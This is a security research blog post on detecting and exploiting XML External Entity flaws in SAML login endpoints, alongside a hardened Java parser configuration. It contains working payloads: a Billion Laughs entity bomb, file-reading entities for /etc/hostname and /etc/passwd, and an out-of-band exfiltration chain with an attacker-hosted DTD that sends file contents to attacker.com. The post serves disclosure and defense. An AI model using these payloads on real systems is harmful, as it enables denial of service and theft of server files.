This post will describe some findings, problems, and insights regarding XML External Entity Attacks (XXEA) that we gathered during a large-scale security analysis of several SAML interfaces.
XXEA has been a popular attack class in recent months; see, for example:

How we got read access on Google’s production servers
XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

This post will explain the basics of XXEA and how to adapt them to SAML, including some special problems you have to cope with.

First, we introduce the concepts of Document Type Definition (DTD) and XML External Entity (XXE), and afterwards some basics of SAML. If you are familiar with these concepts, you may want to skip these sections and go directly to the section XXEA on SAML.

Document Type Definition (DTD) and XML External Entity (XXE)

Understanding DTD

XML offers the possibility to describe the document's structure by using a Document Type Definition (DTD). This is well known from classical HTML documents:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
...

Many people think that the declaration above just indicates that the content within the document contains HTML 4.01 data, but technically, there is more.
This declaration defines the HTML doctype that is identified by "-//W3C//DTD HTML 4.01 Transitional//EN". The exact definition is publicly available, and the URL points to its declaration:

% curl -D- http://www.w3.org/TR/html4/loose.dtd

HTTP/1.1 200 OK
...
Content-Type: text/plain

<!ENTITY % HTML.Version "-//W3C//DTD HTML 4.01 Transitional//EN"
<!ENTITY % HTML.Frameset "IGNORE">
<!ENTITY % ContentType "CDATA"

...

It now depends on the document parser whether this URL is resolved or not. There are good reasons not to fetch the DTD every time, for instance, to save time. Additionally, it is not needed for HTML, because this DTD is well known and most probably built into every browser.

Understanding XML Entity

However, the concept of DTD is generic and offers more features; for example, a DTD allows defining an ENTITY:

<!DOCTYPE Response [
<!ENTITY msg 'Hello World'>
]>

<Response>&msg;</Response>

In this case, the Entity msg is defined as the String 'Hello World'. This concept is also very widespread in HTML; for example, &lt; (<) or &amp; (&) can be used to encode specific characters (these are default HTML Entities that are defined by the DTD).

Technically, the XML/HTML parser that processes the given document resolves each ENTITY; for instance, it replaces &msg; with the String 'Hello World'.
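The resolution step can be observed with the XML parser bundled with the JDK. The following is a minimal sketch; the class and method names are hypothetical and only serve this illustration.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

final class InternalEntityDemo {
    // The document from the example above; msg is an internal (string) entity
    static final String XML = "<!DOCTYPE Response [\n"
            + "<!ENTITY msg 'Hello World'>\n"
            + "]>\n"
            + "<Response>&msg;</Response>";

    // Parses the document with the JDK's default settings and returns the root element's text
    static String rootText(String xml) {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            return dbf.newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)))
                    .getDocumentElement()
                    .getTextContent(); // &msg; has been replaced by 'Hello World'
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
    }
}
```

With these defaults, rootText(XML) returns the String Hello World, i.e., the parser has replaced &msg; before the application reads the element content.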

Entity resolution is not problematic per se, but it can be abused for very effective Denial-of-Service (DoS) attacks if used like this:

<!DOCTYPE Response [
<!ENTITY a 'aaaaaa'>
<!ENTITY b '&a;&a;&a;&a;&a;'>
<!ENTITY c '&b;&b;&b;&b;&b;'>
...
<!ENTITY z '&y;&y;&y;&y;&y;'>
]>

<Response>&z;</Response>

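When this message is parsed, the entity &z; is resolved recursively; since every level references the previous one five times, the expanded text grows exponentially, which leads to high memory consumption. This attack is also known as the Billion Laughs attack.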
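To see why this is so effective, the size of the expansion can be computed. This sketch assumes that the elided declarations (c to y) continue the pattern shown, each one referencing its predecessor five times; the class name is hypothetical.

```java
final class BillionLaughs {
    // Length of the replacement text of the entity named 'a'..'z' in the DTD above,
    // assuming every entity after 'a' references its predecessor exactly five times
    static long expandedLength(char entityName) {
        if (entityName < 'a' || entityName > 'z') {
            throw new IllegalArgumentException("entity names run from 'a' to 'z'");
        }
        long length = 6; // &a; is the six-character String 'aaaaaa'
        for (int level = 'a'; level < entityName; level++) {
            // each further level concatenates five copies of the previous one
            length = Math.multiplyExact(length, 5L);
        }
        return length;
    }
}
```

Under that assumption, &z; expands to 6 × 5^25 = 1,788,139,343,261,718,750 characters (about 1.8 × 10^18), although the DTD itself is less than a kilobyte long.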

Understanding XML External Entity

In addition to XML Entities, DTDs offer the ability to define External Entities. The concept is similar to the HTML definition above:

<!DOCTYPE Message [
<!ENTITY msg SYSTEM '/etc/hostname'>
]>

<Message>&msg;</Message>

Instead of defining a simple string for the Entity msg, this example lets the document parser load the content of a specified file, here the '/etc/hostname' file.
There are several ways to do this:

<!ENTITY msg SYSTEM '/etc/hostname'>
<!ENTITY msg SYSTEM 'file:///etc/hostname'>
<!ENTITY msg SYSTEM 'http://myserver.com/something'>
<!ENTITY msg PUBLIC 'm' '/etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'file:///etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'http://myserver.com/something'>

The examples above differ mainly in two aspects:

SYSTEM vs PUBLIC: As the names suggest, SYSTEM Entities are commonly used for files stored locally on the machine, whereas PUBLIC Entities are used for well-known public resources, for example, the HTML definition mentioned earlier. Technically, however, both contain a URI (the system identifier) that the parser loads. PUBLIC Entities additionally need a public identifier (here: 'm'), but unless the parser maps public identifiers to local copies via a catalog, its value does not matter. Both forms can therefore point to local files as well as to remote resources.
The protocol: Depending on the parser (and thus the programming language), it is possible to use the absolute path of a file or the file:// protocol. Most parsers additionally understand the http:// and https:// handlers, and Java, for instance, also supports the jar: protocol (which reads entries from ZIP/JAR archives and thus basically allows unzipping files).
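The point that SYSTEM and PUBLIC declarations both load their URI can be checked with the JDK's default parser. In this sketch (class and method names hypothetical), a temporary file stands in for /etc/hostname, so the example does not depend on a particular machine.

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

final class ExternalEntityDemo {
    // Parses <Message>&msg;</Message>, where msg is declared by the given declaration
    static String resolve(String entityDeclaration) {
        String xml = "<!DOCTYPE Message [\n" + entityDeclaration + "\n]>\n"
                + "<Message>&msg;</Message>";
        try {
            // JDK defaults: DTD processing and external general entities are enabled
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            return dbf.newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)))
                    .getDocumentElement()
                    .getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
    }

    // Writes a stand-in for /etc/hostname to a temporary file and returns its file: URI
    static String createDemoFile(String content) {
        try {
            Path file = Files.createTempFile("hostname", ".txt");
            Files.writeString(file, content);
            file.toFile().deleteOnExit();
            return file.toUri().toString();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}
```

With the default settings of the JDK versions we are aware of, both resolve("<!ENTITY msg SYSTEM '" + uri + "'>") and resolve("<!ENTITY msg PUBLIC 'm' '" + uri + "'>") return the file's content; the public identifier 'm' plays no role.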

XML External Entity Attack (XXEA)

An XML External Entity Attack works as follows:

The attacker prepares an XML message together with a DTD as shown above. This message commonly includes an XXE that reads a locally stored file, for example '/etc/hostname'.
The attacker sends the prepared XML message to the Web Application.
The Web Application processes the incoming XML message.
It parses the DTD, resolves the XXE, and then processes the resulting XML.
The Web Application sends an HTTP response to the attacker.
For a successful XXEA, this response must somehow contain the content of the locally stored file, for example the '/etc/hostname' file.
On a very basic level, this can be compared to reflected XSS.
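To make these steps concrete, the following sketch models a deliberately vulnerable Web Application endpoint. The class, its methods, and the "Received: " response format are hypothetical; the point is only that parsing with the JDK's defaults resolves the XXE and that the response reflects the result.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

// Hypothetical, deliberately vulnerable endpoint for illustration only: do not deploy
final class VulnerableEchoEndpoint {

    // The attacker's message: an XXE that reads a locally stored file
    static String buildAttackMessage(String fileUri) {
        return "<!DOCTYPE Message [\n"
                + "<!ENTITY msg SYSTEM '" + fileUri + "'>\n"
                + "]>\n"
                + "<Message>&msg;</Message>";
    }

    // The Web Application parses with JDK defaults (resolving the XXE) and reflects the text
    static String handle(String requestBody) {
        try {
            String text = DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new InputSource(new StringReader(requestBody)))
                    .getDocumentElement()
                    .getTextContent();
            return "Received: " + text;
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
}
```

Passing buildAttackMessage(fileUri) to handle(...) yields "Received: " followed by the file's content, which is exactly the reflection a successful XXEA relies on.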

Preventing XXEA

Given the number of ways to mount an XXEA, preventing it is not that easy. It is additionally alarming that most XML parsers have DTD processing enabled by default (and therefore process XXE in most cases).

This is, for instance, the case for the default Java XML parser. To mitigate XXEA, one has to configure the parser as follows:

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

final class SecureParserFactory {
    static DocumentBuilderFactory newInstance() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

        // not important to prevent XXEA
        dbf.setNamespaceAware(true);

        // strongest option if no DTD is needed (as for SAML): reject any DOCTYPE declaration
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

        // do not validate against a DTD: with validation on, the external DTD is always loaded
        dbf.setValidating(false);

        // do not expand entity reference nodes
        dbf.setExpandEntityReferences(false);

        // do not include external general entities
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

        // do not include external parameter entities or the external DTD subset
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

        // build the grammar but do not use the default attributes and attribute types information it contains
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-dtd-grammar", false);

        // ignore the external DTD completely
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

        return dbf;
    }
}
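A quick way to check a configuration is to feed it an XXE message and confirm that it is rejected. This sketch (class and method names hypothetical) also enables the Xerces feature http://apache.org/xml/features/disallow-doctype-decl, which the JDK's built-in parser supports and which makes the parser reject every document that contains a DOCTYPE; SAML messages do not need one.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

final class HardenedParserCheck {
    static DocumentBuilderFactory hardenedFactory() {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setNamespaceAware(true);
            // Fail with a fatal error on any DOCTYPE declaration
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defense in depth in case the DOCTYPE ban is ever lifted
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            dbf.setXIncludeAware(false);
            dbf.setExpandEntityReferences(false);
            return dbf;
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException(e);
        }
    }

    // Returns true if a parser from this factory refuses the given document
    static boolean rejects(DocumentBuilderFactory dbf, String xml) {
        try {
            dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXParseException e) {
            return true; // e.g. "DOCTYPE is disallowed ..."
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }
}
```

A DOCTYPE-free SAML message still parses normally, so this check can be part of an application's test suite.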

Security Assertion Markup Language (SAML)

The most important industry standard for Identity Management is the Security Assertion Markup Language (SAML). SAML is based on the eXtensible Markup Language (XML) and enables the secure exchange of XML-based authentication messages.
In conjunction with Single Sign-On (SSO) systems, SAML especially offers a standardized format for authentication tokens.

The good thing first:

For understanding how XXEA can be used in SAML, it is not necessary to understand how SAML exactly works.

All we need to know is:

SAML Assertions are XML. This fact allows us to include a DTD.
The XML message is transmitted to the server as a Base64-encoded and then URL-encoded String.
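The encoding from the second point can be sketched with the JDK's java.util.Base64 and java.net.URLEncoder (the Charset overloads require Java 10 or later). The class name is hypothetical. This covers only the Base64-plus-URL encoding described here; in the SAML HTTP-POST binding, the result is the value of the form field SAMLResponse, whereas the HTTP-Redirect binding would additionally DEFLATE-compress the message.

```java
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class SamlEncoding {
    // Base64-encodes the XML, then URL-encodes the result for use as a parameter value
    static String encode(String xml) {
        String base64 = Base64.getEncoder()
                .encodeToString(xml.getBytes(StandardCharsets.UTF_8));
        // '+', '/' and '=' from the Base64 alphabet become percent escapes
        return URLEncoder.encode(base64, StandardCharsets.UTF_8);
    }

    // Reverses encode(): URL-decode first, then Base64-decode
    static String decode(String parameterValue) {
        String base64 = URLDecoder.decode(parameterValue, StandardCharsets.UTF_8);
        return new String(Base64.getDecoder().decode(base64), StandardCharsets.UTF_8);
    }
}
```

encode(xml) produces a value consisting only of letters, digits, and percent escapes, so it can be placed into a request parameter unchanged; decode(...) restores the original XML.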

The bad thing about SAML and XXEA is that applications which verify SAML Assertions commonly do not reflect any content.
This means that, in contrast to the first XXEA example, we can make the parser read the content of a system resource using XXE, but the application does not send this content back, so it does not become accessible to the attacker.

The Figure above illustrates the problem. The only thing that is sent back to the user (attacker) is whether the login was successful or not. During our study, only a few applications responded with a specific error message, but in no case did this message reflect any content from the SAML Assertion.
Thus, we had to find another way to retrieve the content of system resources.

XXEA on SAML

Detection Phase

Before we executed the XXEA, we started with the detection phase.
The requirements for an XXEA are:

The server processes DTD.
XXE is allowed and processed within the DTD.

To detect whether these requirements are fulfilled, we send the following request (Base64- and URL-encoded) to the SAML URL Endpoint of the Web Application:

<!DOCTYPE Message [
<!ENTITY send SYSTEM "http://attacker.com/working">
]>
<Message>&send;</Message>

We set up a Web Server reachable at the domain "http://attacker.com". If the targeted Web Application processes the DTD and resolves the XXE, our Web Server receives a GET request and XXEA might be possible.

If we do not receive a GET request, we try the same idea with PUBLIC instead of SYSTEM, because some parsers might disable SYSTEM processing while PUBLIC is still allowed.
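The Web Server at attacker.com only needs to log incoming requests. A minimal sketch using the HTTP server bundled with the JDK (com.sun.net.httpserver, module jdk.httpserver); the class name, the constructor parameters, and the plain "ok" response body are our assumptions.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.io.OutputStream;
import java.io.UncheckedIOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;

// Minimal callback server: records the path (and query) of every request it receives
final class CallbackListener {
    private final HttpServer server;
    private final List<String> requests = new CopyOnWriteArrayList<>();

    CallbackListener(String host, int port) {
        try {
            server = HttpServer.create(new InetSocketAddress(host, port), 0);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        server.createContext("/", exchange -> {
            // e.g. "/working" once the target has resolved the detection XXE
            requests.add(exchange.getRequestURI().toString());
            byte[] body = "ok".getBytes(StandardCharsets.UTF_8);
            exchange.sendResponseHeaders(200, body.length);
            try (OutputStream out = exchange.getResponseBody()) {
                out.write(body);
            }
        });
    }

    void start() { server.start(); }

    void stop() { server.stop(0); }

    int port() { return server.getAddress().getPort(); }

    List<String> requests() { return requests; }
}
```

In a real test, the listener would be bound to the public interface of attacker.com; binding to port 80 usually requires elevated privileges.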

Exploit Phase

Since Web Applications using SAML do not reflect content from the SAML Assertion, we wanted to send the content of the system resource as a GET parameter to our own server (http://attacker.com).
The basic idea looks as follows:

<!DOCTYPE Message [
<!ENTITY file SYSTEM "/etc/hostname">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<Message>&send;</Message>

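The code above does not work directly.
An entity reference such as &file; is not expanded inside the URL (the system identifier) of another entity declaration, so external entities cannot be nested this way: the content of the file never becomes part of the request, and depending on the parser, the DTD processing may even be aborted when the file Entity is found within the send Entity declaration.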

Nevertheless, another DTD feature called Parameter Entities allows bypassing this restriction. The idea is described in a whitepaper on DTD and XXE attacks by Morgan et al.

<!DOCTYPE Message [
<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % dtd SYSTEM 'http://attacker.com/mydtd'>
%dtd;]>
<Message>&send;</Message>

The above content is then Base64- and URL-encoded and sent to the SAML Endpoint URL of the Web Application. Please note that the Entity send within the <Message> Element is not defined directly in the DTD. It will be defined later on, in the DTD that is loaded from 'http://attacker.com/mydtd'.

Parameter Entities look similar to common Entities but start with a percent sign (%). They can be seen as a meta language for DTDs (comparable to #define instructions in C/C++).
The Web Application processes the DTD as follows:

The parser processes the first Parameter Entity % file, which refers to the /etc/hostname system resource.
It then processes the second Parameter Entity % dtd.
This one forces the parser to load an External DTD that is provided by the attacker's HTTP server.

The attacker's server responds with:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/send/%file;'>">
%all;
This file is immediately parsed and processed.
It defines a Parameter Entity % all that declares an Entity send.
The send Entity is an External Entity pointing again to the attacker's server. Its URL contains a reference to the file Parameter Entity; since this declaration is part of an external DTD, the reference is replaced by the content of /etc/hostname.
The last line contains only "%all;". This means that the content of the %all Entity, which is the declaration of the send Entity, is placed at this position.
The last line of the DTD in the attacker's request contains "%dtd;". This means that the content of the file 'http://attacker.com/mydtd' is placed at this position, which (again) yields the declaration of the send Entity.
Once the Web Application processes the line "<Message>&send;</Message>", it sends a GET request to 'http://attacker.com/send/%file;' with %file; replaced by the file content, and the attacker thus receives the content of the '/etc/hostname' file.
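Both documents from the steps above can be generated for an arbitrary target file and callback server. The helper names are hypothetical; the DTD text is taken from the example above, with the server URLs turned into parameters.

```java
// Builds the two documents of the parameter-entity technique described above
final class OobPayloads {

    // Document sent (Base64- and URL-encoded) to the SAML endpoint
    static String request(String fileUri, String dtdUrl) {
        return "<!DOCTYPE Message [\n"
                + "<!ENTITY % file SYSTEM '" + fileUri + "'>\n"
                + "<!ENTITY % dtd SYSTEM '" + dtdUrl + "'>\n"
                + "%dtd;]>\n"
                + "<Message>&send;</Message>";
    }

    // External DTD served by the attacker; %file; is expanded when %all is declared
    static String attackerDtd(String callbackBase) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!ENTITY % all \"<!ENTITY send SYSTEM '" + callbackBase + "/send/%file;'>\">\n"
                + "%all;\n";
    }
}
```

For a local dry run, all URLs can be file: URIs: if the callback base is a directory that contains send/<file content>, parsing the request with the JDK's defaults returns the content of that file, which shows that the exfiltration URL was built as expected.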

Problems with this approach and their solutions

During our study, we found some interesting problems.

Firewall

Most Web Applications are behind a firewall. At the beginning of our evaluation, we used a Web Server that was reachable on http://attacker.com:9090. The problem with this approach was that some Web Applications were not allowed to send GET requests to port 9090 due to firewall policies.
Once we changed our Server port to 80 (default HTTP), the detection phase was successful.

Special Characters and Linefeed

For the exploit phase, the attacker has to choose which file to read. We tried different ones; the most popular choice is the '/etc/passwd' file.
However, this file might include whitespace, line feeds, and special characters.
Depending on the target Web Application and its XML parser, such a file can cause problems. For example, these characters can break the parsing of the GET request URL, and characters like '<' can produce invalid XML that cannot be parsed.

Thus, we prefer to use the file '/etc/hostname' for testing purposes.

In PHP, there is a convenient way to read arbitrary files by encoding them directly with Base64:

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
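On the attacker's side, such a Base64 value still has to be decoded. The sketch below assumes that the target encoded the file with the php://filter entity above and that the encoded value arrives as the remainder of a request path such as /send/<value>, as with the attacker's DTD from the exploit phase; the class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Decodes a file content that was exfiltrated as Base64 at the end of a request path
final class ExfilDecoder {
    static String decode(String requestPath, String prefix) {
        if (!requestPath.startsWith(prefix)) {
            throw new IllegalArgumentException("unexpected path: " + requestPath);
        }
        // Everything after the prefix is the Base64 value (it may itself contain '/')
        String base64 = requestPath.substring(prefix.length());
        // The basic decoder expects the standard alphabet (A-Z, a-z, 0-9, '+', '/') and '=' padding
        return new String(Base64.getDecoder().decode(base64), StandardCharsets.UTF_8);
    }
}
```

Because the decoded String keeps line feeds and special characters intact, this route avoids the problems described above for files like '/etc/passwd'.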

Load Balancers

We observed strange behavior on some Web Applications.
We sent several XXEA messages to them and tried to read the '/etc/hostname' file. This failed in some attempts but succeeded in others.

This is due to the fact that the Web Application was behind a load balancer that delegates the requests to different servers.
On some of them, the '/etc/hostname' file exists; on others, it does not. The latter is, for example, the case for CentOS servers.

We looked at the User-Agent header of the requests that the Web Application sent to attacker.com and found that it differed randomly, for instance, User-Agent: Java/1.6.0_45 and User-Agent: Java/1.7.0_55. This indicates that different servers process the requests.
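Grouping the callback requests by User-Agent makes this observation systematic. In a listener based on com.sun.net.httpserver, the header value can be read with exchange.getRequestHeaders().getFirst("User-Agent"); the sketch below (class name hypothetical) only shows the counting.

```java
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

// Counts callback requests per User-Agent; several entries hint at several back-end servers
final class BackendFingerprint {
    static Map<String, Integer> countByUserAgent(List<String> userAgents) {
        Map<String, Integer> counts = new TreeMap<>(); // sorted for stable output
        for (String userAgent : userAgents) {
            counts.merge(userAgent, 1, Integer::sum);
        }
        return counts;
    }
}
```

Seeing both Java/1.6.0_45 and Java/1.7.0_55 in the result for one target is the pattern described above.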

Evaluation Results

During our study, we have evaluated 22 Software-as-a-Service Web Applications that support Single Sign-On via SAML.
Ten of them were vulnerable to XXEA, and we have reported our results to them.

Conclusion

Our study showed that XXEA is a real threat to SAML applications. The biggest problem is that DTD processing, a prerequisite for XXEA, is enabled by default in most XML parsers, but developers seem to be unaware of this feature.

The full paper can be found here:

http://nds.rub.de/research/publications/saml-saas/

Authors of this Post

Vladislav Mladenov
Christian Mainka (@CheariX)

Detecting and exploiting XXE in SAML Interfaces